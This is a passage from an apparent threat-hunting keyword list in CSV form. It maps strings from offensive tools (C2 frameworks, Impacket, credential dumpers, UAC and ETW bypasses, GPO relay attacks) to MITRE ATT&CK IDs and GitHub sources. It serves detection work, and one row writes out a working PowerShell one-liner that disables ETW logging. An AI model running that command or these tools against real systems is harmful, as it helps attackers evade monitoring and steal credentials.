T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*:8999/Payloads/*","offensive_tool_keyword","primusC2","another C2 framework","T1090 - T1071","TA0011 - TA0002","N/A","N/A","C2","https://github.com/Primusinterp/PrimusC2","1","1","N/A","10","10","42","4","2023-08-21T04:05:48Z","2023-04-19T10:59:30Z" +"*:9090*/api/v1.0/relays*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*?convert_ccache_to_kirbi*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*?convert_kirbi_to_ccache*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*?PSAmsi*PSReflect.ps1*","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","1","N/A","7","4","382","74","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z" +"*?sample_sliver.json*","offensive_tool_keyword","nanorobeus","COFF file (BOF) for managing Kerberos tickets.","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","C2","https://github.com/wavvs/nanorobeus","1","0","N/A","10","10","234","28","2023-07-02T12:56:27Z","2022-07-04T00:33:30Z" +"*[!] Failed to enumerate Credman:*","offensive_tool_keyword","SharpAzbelt","This is an attempt to port Azbelt by Leron Gray from Nim to C#. It can be used to enumerate and pilfer Azure-related credentials from Windows boxes and Azure IaaS resources","T1082 - T1003 - T1027 - T1110 - T1078","TA0006 - TA0007 - TA0005 - TA0004 - TA0003","N/A","N/A","Discovery - Collection","https://github.com/redskal/SharpAzbelt","1","0","N/A","8","1","23","6","2023-09-21T21:47:32Z","2023-09-21T21:44:03Z" +"*[!] Dumping the ntds can crash the DC on Windows Server 2019. Use the option*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*[!] Failed to download legitimate GPO from SYSVOL (dc_ip:*","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","9","1","91","6","2023-10-04T21:15:32Z","2023-09-01T08:13:25Z" +"*[!] Failed to write malicious scheduled task to downloaded GPO. Exiting*","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","9","1","91","6","2023-10-04T21:15:32Z","2023-09-01T08:13:25Z" +"*[#] Ready For ETW Patch.*","offensive_tool_keyword","Fuck-Etw","Bypass the Event Trace Windows(ETW) and unhook ntdll.","T1070.004 - T1055.001","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/unkvolism/Fuck-Etw","1","0","N/A","10","1","63","9","2023-09-29T21:19:10Z","2023-09-25T18:59:10Z" +"*[*] Downloading the legitimate GPO from SYSVOL*","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","9","1","91","6","2023-10-04T21:15:32Z","2023-09-01T08:13:25Z" +"*[*] Injecting malicious scheduled task into downloaded GPO*","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","9","1","91","6","2023-10-04T21:15:32Z","2023-09-01T08:13:25Z" +"*[*] Smuggling in HTML*","offensive_tool_keyword","AutoSmuggle","Utility to craft HTML or SVG smuggled files for Red Team engagements","T1027.006 - T1598","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/surajpkhetani/AutoSmuggle","1","0","N/A","9","2","142","21","2023-09-02T08:09:50Z","2022-03-20T19:02:06Z" +"*[*] Smuggling in SVG*","offensive_tool_keyword","AutoSmuggle","Utility to craft HTML or SVG smuggled files for Red Team engagements","T1027.006 - T1598","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/surajpkhetani/AutoSmuggle","1","0","N/A","9","2","142","21","2023-09-02T08:09:50Z","2022-03-20T19:02:06Z" +"*[*] Updating downloaded GPO version number to ensure automatic GPO application*","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","9","1","91","6","2023-10-04T21:15:32Z","2023-09-01T08:13:25Z" +"*[-] failed to spawn shell: %s*","offensive_tool_keyword","EQGR","Equation Group hack tool leaked by ShadowBrokers- file elgingamble Local exploit for the public prctl core dump vulnerability in recent Linux kernels","T1213.001 - T1203.001","TA0001 - TA0003","N/A","N/A","Shell spawning","https://fdik.org/EQGRP/Linux/doc/old/etc/user.tool.elgingamble.COMMON","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*[-] kernel not vulnerable*","offensive_tool_keyword","EQGR","Equation Group hack tool leaked by ShadowBrokers- file elgingamble Local exploit for the public prctl core dump vulnerability in recent Linux kernels.","T1213.001 - T1203.001","TA0001 - TA0003","N/A","N/A","Shell spawning","https://fdik.org/EQGRP/Linux/doc/old/etc/user.tool.elgingamble.COMMON","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*[-] Seems like we killed auditd. Ooopsie :D*","offensive_tool_keyword","apollon","evade auditd by writing /proc/PID/mem","T1054.001 - T1055.001 - T1012","TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/codewhitesec/apollon","1","0","N/A","8","1","13","5","2023-08-21T05:43:36Z","2023-07-31T11:55:43Z" +"*[+] Adding your DLL to the LSA Security Packages registry key*","offensive_tool_keyword","ImplantSSP","Installs a user-supplied Security Support Provider (SSP) DLL on the system which will be loaded by LSA on system start","T1547.008 - T1073.001 - T1055.001","TA0003 - TA0005","N/A","N/A","Persistence - Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/ImplantSSP","1","0","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*[+] Attack aborted. Exiting*","offensive_tool_keyword","ShadowSpray","A tool to spray Shadow Credentials across an entire domain in hopes of abusing long forgotten GenericWrite/GenericAll DACLs over other objects in the domain.","T1110.003 - T1098 - T1059 - T1075","TA0001 - TA0008 - TA0009","N/A","N/A","Discovery","https://github.com/ShorSec/ShadowSpray","1","0","N/A","7","5","408","72","2022-10-14T13:36:51Z","2022-10-10T08:34:07Z" +"*[+] Attempting to call the target EXE from the mock directory*","offensive_tool_keyword","MockDirUACBypass","Creates a mock trusted directory C:\Windows \System32\ and moves an auto-elevating Windows executable into the mock directory. A user-supplied DLL which exports the appropriate functions is dropped and when the executable is run - the DLL is loaded and run as high integrity.","T1574.002 - T1547.008 - T1059.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/MockDirUACBypass","1","0","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*[+] auditd patched successfully*","offensive_tool_keyword","apollon","evade auditd by writing /proc/PID/mem","T1054.001 - T1055.001 - T1012","TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/codewhitesec/apollon","1","0","N/A","8","1","13","5","2023-08-21T05:43:36Z","2023-07-31T11:55:43Z" +"*[+] Back to C&C Console*","offensive_tool_keyword","C2_Server","C2 server to connect to a victim machine via reverse shell","T1090 - T1090.001 - T1071 - T1071.001","TA0011 ","N/A","N/A","C2","https://github.com/reveng007/C2_Server","1","0","N/A","10","10","31","17","2022-02-27T02:00:02Z","2021-03-05T12:35:45Z" +"*[+] Bof replay:*","offensive_tool_keyword","Nightmangle","ightmangle is post-exploitation Telegram Command and Control (C2/C&C) Agent","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/1N73LL1G3NC3x/Nightmangle","1","0","N/A","10","10","73","10","2023-09-26T19:21:31Z","2023-09-26T18:25:23Z" +"*[+] Creating mock directories*","offensive_tool_keyword","MockDirUACBypass","Creates a mock trusted directory C:\Windows \System32\ and moves an auto-elevating Windows executable into the mock directory. A user-supplied DLL which exports the appropriate functions is dropped and when the executable is run - the DLL is loaded and run as high integrity.","T1574.002 - T1547.008 - T1059.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/MockDirUACBypass","1","0","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*[+] Deobfuscated dump saved in file decrypted.dmp*","offensive_tool_keyword","PPLBlade","Protected Process Dumper Tool that support obfuscating memory dump and transferring it on remote workstations without dropping it onto the disk.","T1003.001 - T1027.004 - T1560.001 - T1039 - T1570","TA0006 - TA0005 - TA0010 - TA0003","N/A","N/A","Credential Access - Data Exfiltration","https://github.com/tastypepperoni/PPLBlade","1","0","N/A","10","4","324","36","2023-08-30T07:59:51Z","2023-08-29T19:36:04Z" +"*[+] Enumerating driver services...*","offensive_tool_keyword","DriverQuery","Collect details about drivers on the system and optionally filter to find only ones not signed by Microsoft","T1124 - T1057 - T1082","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/matterpreter/OffensiveCSharp/tree/master/DriverQuery","1","0","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*[+] ETW Patched, No Logs No Crime !*","offensive_tool_keyword","Fuck-Etw","Bypass the Event Trace Windows(ETW) and unhook ntdll.","T1070.004 - T1055.001","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/unkvolism/Fuck-Etw","1","0","N/A","10","1","63","9","2023-09-29T21:19:10Z","2023-09-25T18:59:10Z" +"*[+] Generated XOR key: *","offensive_tool_keyword","Supernova","securely encrypt raw shellcodes","T1027 - T1055.004 - T1140","TA0002 - TA0005 - TA0042","N/A","N/A","Exploitation tools","https://github.com/nickvourd/Supernova","1","0","N/A","10","4","347","50","2023-10-04T09:27:32Z","2023-08-08T11:30:34Z" +"*[+] Generating base64 encoded PowerShell script*","offensive_tool_keyword","SpaceRunner","enables the compilation of a C# program that will execute arbitrary PowerShell code without launching PowerShell processes through the use of runspace.","T1059.001 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mr-B0b/SpaceRunner","1","0","N/A","7","2","185","38","2020-07-26T10:39:53Z","2020-07-26T09:31:09Z" +"*[+] Keylogger started*","offensive_tool_keyword","C2_Server","C2 server to connect to a victim machine via reverse shell","T1090 - T1090.001 - T1071 - T1071.001","TA0011 ","N/A","N/A","C2","https://github.com/reveng007/C2_Server","1","0","N/A","10","10","31","17","2022-02-27T02:00:02Z","2021-03-05T12:35:45Z" +"*[+] Keylogger stopped*","offensive_tool_keyword","C2_Server","C2 server to connect to a victim machine via reverse shell","T1090 - T1090.001 - T1071 - T1071.001","TA0011 ","N/A","N/A","C2","https://github.com/reveng007/C2_Server","1","0","N/A","10","10","31","17","2022-02-27T02:00:02Z","2021-03-05T12:35:45Z" +"*[+] keystrokes dump from agent*","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","0","N/A","10","10","234","35","2023-10-01T08:09:18Z","2022-10-08T19:02:58Z" +"*[+] Opened Process Token Sucessufully!*","offensive_tool_keyword","BesoToken","A tool to Impersonate logged on users without touching LSASS (Including non-Interactive sessions).","T1134 - T1003.002","TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/OmriBaso/BesoToken","1","0","N/A","10","1","91","11","2022-11-23T10:45:07Z","2022-11-21T01:07:51Z" +"*[+] Registry key set. DLL will be loaded on reboot*","offensive_tool_keyword","ImplantSSP","Installs a user-supplied Security Support Provider (SSP) DLL on the system which will be loaded by LSA on system start","T1547.008 - T1073.001 - T1055.001","TA0003 - TA0005","N/A","N/A","Persistence - Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/ImplantSSP","1","0","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*[+] Safety checks passed. Implanting your DLL*","offensive_tool_keyword","ImplantSSP","Installs a user-supplied Security Support Provider (SSP) DLL on the system which will be loaded by LSA on system start","T1547.008 - T1073.001 - T1055.001","TA0003 - TA0005","N/A","N/A","Persistence - Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/ImplantSSP","1","0","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*[+] Save encrypted shellcode to *","offensive_tool_keyword","Supernova","securely encrypt raw shellcodes","T1027 - T1055.004 - T1140","TA0002 - TA0005 - TA0042","N/A","N/A","Exploitation tools","https://github.com/nickvourd/Supernova","1","0","N/A","10","4","347","50","2023-10-04T09:27:32Z","2023-08-08T11:30:34Z" +"*[+] SeImpersonatePrivilege enabled*","offensive_tool_keyword","Nightmangle","ightmangle is post-exploitation Telegram Command and Control (C2/C&C) Agent","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/1N73LL1G3NC3x/Nightmangle","1","0","N/A","10","10","73","10","2023-09-26T19:21:31Z","2023-09-26T18:25:23Z" +"*[+] Stole token from*","offensive_tool_keyword","Gotato","Generic impersonation and privilege escalation with Golang. Like GenericPotato both named pipes and HTTP are supported.","T1003.003 - T1056.002 - T1550.001 - T1090","TA0005 - TA0004 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/iammaguire/Gotato","1","0","N/A","9","2","114","16","2021-06-07T21:19:58Z","2021-06-05T22:32:48Z" +"*[+] Successfully downloaded legitimate GPO from SYSVOL to *","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","9","1","91","6","2023-10-04T21:15:32Z","2023-09-01T08:13:25Z" +"*[+] Successfully injected malicious scheduled task*","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","9","1","91","6","2023-10-04T21:15:32Z","2023-09-01T08:13:25Z" +"*[+] Successfully spoofed GPC gPCFileSysPath attribute*","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","9","1","91","6","2023-10-04T21:15:32Z","2023-09-01T08:13:25Z" +"*[+] The encrypted payload with *","offensive_tool_keyword","Supernova","securely encrypt raw shellcodes","T1027 - T1055.004 - T1140","TA0002 - TA0005 - TA0042","N/A","N/A","Exploitation tools","https://github.com/nickvourd/Supernova","1","0","N/A","10","4","347","50","2023-10-04T09:27:32Z","2023-08-08T11:30:34Z" +"*[+] Your payload must be executed now !*","offensive_tool_keyword","SetProcessInjection","alternate technique allowing execution at an arbitrary memory address on a remote process that can be used to replace the standard CreateRemoteThread call.","T1055 - T1055.008 - T1055.001 - T1055.002 - T1055.012","TA0005 - TA0004 - TA0002","N/A","N/A","Defense Evasion","https://github.com/OtterHacker/SetProcessInjection","1","0","N/A","9","1","64","12","2023-10-02T09:23:42Z","2023-10-02T08:21:47Z" +"*[i] AAD Join:*enumerate*","offensive_tool_keyword","SharpAzbelt","This is an attempt to port Azbelt by Leron Gray from Nim to C#. It can be used to enumerate and pilfer Azure-related credentials from Windows boxes and Azure IaaS resources","T1082 - T1003 - T1027 - T1110 - T1078","TA0006 - TA0007 - TA0005 - TA0004 - TA0003","N/A","N/A","Discovery - Collection","https://github.com/redskal/SharpAzbelt","1","0","N/A","8","1","23","6","2023-09-21T21:47:32Z","2023-09-21T21:44:03Z" +"*[i] Credman:*Credential Blob Decrypted*","offensive_tool_keyword","SharpAzbelt","This is an attempt to port Azbelt by Leron Gray from Nim to C#. It can be used to enumerate and pilfer Azure-related credentials from Windows boxes and Azure IaaS resources","T1082 - T1003 - T1027 - T1110 - T1078","TA0006 - TA0007 - TA0005 - TA0004 - TA0003","N/A","N/A","Discovery - Collection","https://github.com/redskal/SharpAzbelt","1","0","N/A","8","1","23","6","2023-09-21T21:47:32Z","2023-09-21T21:44:03Z" +"*[i] Hooked Ntdll Base Address : *","offensive_tool_keyword","Fuck-Etw","Bypass the Event Trace Windows(ETW) and unhook ntdll.","T1070.004 - T1055.001","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/unkvolism/Fuck-Etw","1","0","N/A","10","1","63","9","2023-09-29T21:19:10Z","2023-09-25T18:59:10Z" +"*[i] Unhooked Ntdll Base Address: *","offensive_tool_keyword","Fuck-Etw","Bypass the Event Trace Windows(ETW) and unhook ntdll.","T1070.004 - T1055.001","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/unkvolism/Fuck-Etw","1","0","N/A","10","1","63","9","2023-09-29T21:19:10Z","2023-09-25T18:59:10Z" +"*[Reflection.Assembly]::LoadWithPartialName('System.Core').GetType('System.Diagnostics.Eventing.EventProvider').GetField('m_enabled'*'NonPublic*Instance').SetValue([Ref].Assembly.GetType('System.Management.Automation.Tracing.PSEtwLogProvider').GetField('etwProvider'*'NonPublic*Static').GetValue($null)*0)*","offensive_tool_keyword","powershell","impair the defenses of the targeted system by disabling ETW logging for PowerShell. This can make it difficult for security teams to monitor and analyze PowerShell activities on the system potentially allowing adversaries to perform malicious actions without being detected","T1562","TA0040","N/A","N/A","Defense Evasion","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*['spawnto']*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","0","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" +"*[x] Cannot load NTDLL.DLL*","offensive_tool_keyword","SetProcessInjection","alternate technique allowing execution at an arbitrary memory address on a remote process that can be used to replace the standard CreateRemoteThread call.","T1055 - T1055.008 - T1055.001 - T1055.002 - T1055.012","TA0005 - TA0004 - TA0002","N/A","N/A","Defense Evasion","https://github.com/OtterHacker/SetProcessInjection","1","0","N/A","9","1","64","12","2023-10-02T09:23:42Z","2023-10-02T08:21:47Z" +"*[X] Your harvest exploded:*","offensive_tool_keyword","combine_harvester","Rust in-memory dumper","T1055 - T1055.001 - T1055.012","TA0005 - TA0006","N/A","N/A","Defense Evasion","https://github.com/m3f157O/combine_harvester","1","0","N/A","10","2","101","17","2023-07-26T07:16:00Z","2023-07-20T07:37:51Z" +"*\ rev_shell.py*","offensive_tool_keyword","C2_Server","C2 server to connect to a victim machine via reverse shell","T1090 - T1090.001 - T1071 - T1071.001","TA0011 ","N/A","N/A","C2","https://github.com/reveng007/C2_Server","1","0","N/A","10","10","31","17","2022-02-27T02:00:02Z","2021-03-05T12:35:45Z" +"*\*.O365.GroupMembership_AdminGroups.txt*","offensive_tool_keyword","o365recon","script to retrieve information via O365 and AzureAD with a valid cred ","T1110 - T1081 - T1081.001 - T1114 - T1087","TA0006 - TA0007","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/o365recon","1","0","N/A","N/A","7","617","94","2022-08-14T04:18:28Z","2017-09-02T17:19:42Z" +"*\*.O365.GroupMembership_VPNGroups.txt*","offensive_tool_keyword","o365recon","script to retrieve information via O365 and AzureAD with a valid cred ","T1110 - T1081 - T1081.001 - T1114 - T1087","TA0006 - TA0007","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/o365recon","1","0","N/A","N/A","7","617","94","2022-08-14T04:18:28Z","2017-09-02T17:19:42Z" +"*\*.O365.Roles_Admins.txt*","offensive_tool_keyword","o365recon","script to retrieve information via O365 and AzureAD with a valid cred ","T1110 - T1081 - T1081.001 - T1114 - T1087","TA0006 - TA0007","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/o365recon","1","0","N/A","N/A","7","617","94","2022-08-14T04:18:28Z","2017-09-02T17:19:42Z" +"*\:MLKH*","offensive_tool_keyword","powershell","powershell obfuscations techniques observed by malwares - reversed HKLM:\","T1021 - T1024 - T1027 - T1035 - T1059 - T1070","TA0001 - TA0002 - TA0003 - TA0005 - TA0006","Qakbot","N/A","Defense Evasion","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*\\.\pipe\mimi*","offensive_tool_keyword","SharpBlock","A method of bypassing EDR active projection DLL by preventing entry point exection","T1070.004 - T1055.001 - T1562.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/CCob/SharpBlock","1","0","N/A","10","10","975","147","2021-03-31T09:44:48Z","2020-06-14T10:32:16Z" +"*\\.\pipe\pwned/pipe/srvsvc*","offensive_tool_keyword","MultiPotato","get SYSTEM via SeImpersonate privileges","T1548.002 - T1134.002","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/S3cur3Th1sSh1t/MultiPotato","1","0","pipe name","10","5","485","87","2021-11-20T16:20:23Z","2021-11-19T15:50:55Z" +"*\\:C*","offensive_tool_keyword","powershell","powershell obfuscations techniques observed by malwares - reversed c:\\","T1021 - T1024 - T1027 - T1035 - T1059 - T1070","TA0001 - TA0002 - TA0003 - TA0005 - TA0006","Qakbot","N/A","Defense Evasion","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*\\??\\Jormungandr*","offensive_tool_keyword","Jormungandr","Jormungandr is a kernel implementation of a COFF loader allowing kernel developers to load and execute their COFFs in the kernel","T1215 - T1059.003 - T1547.006","TA0004 - TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Idov31/Jormungandr","1","0","N/A","N/A","3","203","23","2023-09-26T18:06:53Z","2023-06-25T06:24:16Z" +"*\\\\*\\*\\Get-FileLockProcess.ps1*","offensive_tool_keyword","smbmap","SMBMap allows users to enumerate samba share drives across an entire domain. List share drives. drive permissions. share contents. upload/download functionality. file name auto-download pattern matching. and even execute remote commands. This tool was designed with pen testing in mind. and is intended to simplify searching for potentially sensitive data across large networks.","T1210.001 - T1083 - T1213 - T1021","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Information Gathering","https://github.com/ShawnDEvans/smbmap","1","0","N/A","10","10","1555","344","2023-09-14T20:51:52Z","2015-03-16T13:15:00Z" +"*\\\\.\\aswSP_Avar*","offensive_tool_keyword","BYOVD_kill_av_edr","BYOD to kill AV/EDR","T1562.001","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/infosecn1nja/red-team-scripts/blob/main/BYOVD_kill_av_edr.c","1","0","N/A","10","3","229","42","2023-06-14T02:13:19Z","2023-01-15T22:37:34Z" +"*\\\\.\\pipe\\mal*","offensive_tool_keyword","Gotato","Generic impersonation and privilege escalation with Golang. Like GenericPotato both named pipes and HTTP are supported.","T1003.003 - T1056.002 - T1550.001 - T1090","TA0005 - TA0004 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/iammaguire/Gotato","1","0","N/A","9","2","114","16","2021-06-07T21:19:58Z","2021-06-05T22:32:48Z" +"*\\\\.\\pipe\\warpzone8*","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","0","N/A","N/A","3","272","33","2023-08-17T02:45:17Z","2023-06-10T03:30:59Z" +"*\\\\127.0.0.1\\pipe\\warpzone8*","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","0","N/A","N/A","3","272","33","2023-08-17T02:45:17Z","2023-06-10T03:30:59Z" +"*\\127.0.0.1\c$*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*\\c$\Windows\Temp\*.dmp*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" +"*\\DCSC_stdInPipe*","offensive_tool_keyword","SharpShellPipe","interactive remote shell access via named pipes and the SMB protocol.","T1056.002 - T1021.002 - T1059.001","TA0005 - TA0009 - TA0002","N/A","N/A","Lateral movement","https://github.com/DarkCoderSc/SharpShellPipe","1","0","N/A","8","1","98","14","2023-08-27T13:12:39Z","2023-08-25T15:18:30Z" +"*\\DCSC_stdOutPipe*","offensive_tool_keyword","SharpShellPipe","interactive remote shell access via named pipes and the SMB protocol.","T1056.002 - T1021.002 - T1059.001","TA0005 - TA0009 - TA0002","N/A","N/A","Lateral movement","https://github.com/DarkCoderSc/SharpShellPipe","1","0","N/A","8","1","98","14","2023-08-27T13:12:39Z","2023-08-25T15:18:30Z" +"*\\GetWebDAVStatus.exe*","offensive_tool_keyword","cobaltstrike","Determine if the WebClient Service (WebDAV) is running on a remote system","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - 